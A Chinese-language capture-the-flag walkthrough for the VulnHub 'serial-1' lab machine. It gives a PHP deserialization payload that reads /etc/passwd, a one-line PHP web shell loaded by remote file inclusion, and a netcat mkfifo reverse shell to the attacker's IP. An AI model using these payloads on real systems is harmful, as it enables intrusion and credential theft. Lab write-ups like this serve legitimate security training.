去vulhub上下载此靶机：
https://www.vulnhub.com/entry/serial-1,349/
用Vmware新建虚拟机打开

用kali扫描ip  arp-scan -l

访问扫描到的靶机ip访问

按F12 ---》网络---》cookie得到一串编码

base64解码

dirb http://靶机ip   扫描目录

访问backup目录

解压得到三个php文件

构造payload

<?php
  class Log {
    private $type_log = "/etc/passwd";
  }
 
  class User {
    private $name = "admin";
    private $wel;
 
    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));
?>

访问构造好的php文件获取到base64编码后的字节序列

抓包，将编码后的数据抓包后替换红色部分

写一个cmd.txt文件

<?php @system($ GET['cmd']); ?>

修改palyload改为本机ip加上我们创建的文件

访问重新修改的gouzao.php文件

攻击模块替换 查询ip

成功执行反弹shell

讲以下参数修改为kali  ip 和指定端口去kali监听

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.162.129+8888+>/tmp/f

开启监听  

查找txt文件

查看账号密码

用御剑扫描端口

远程连接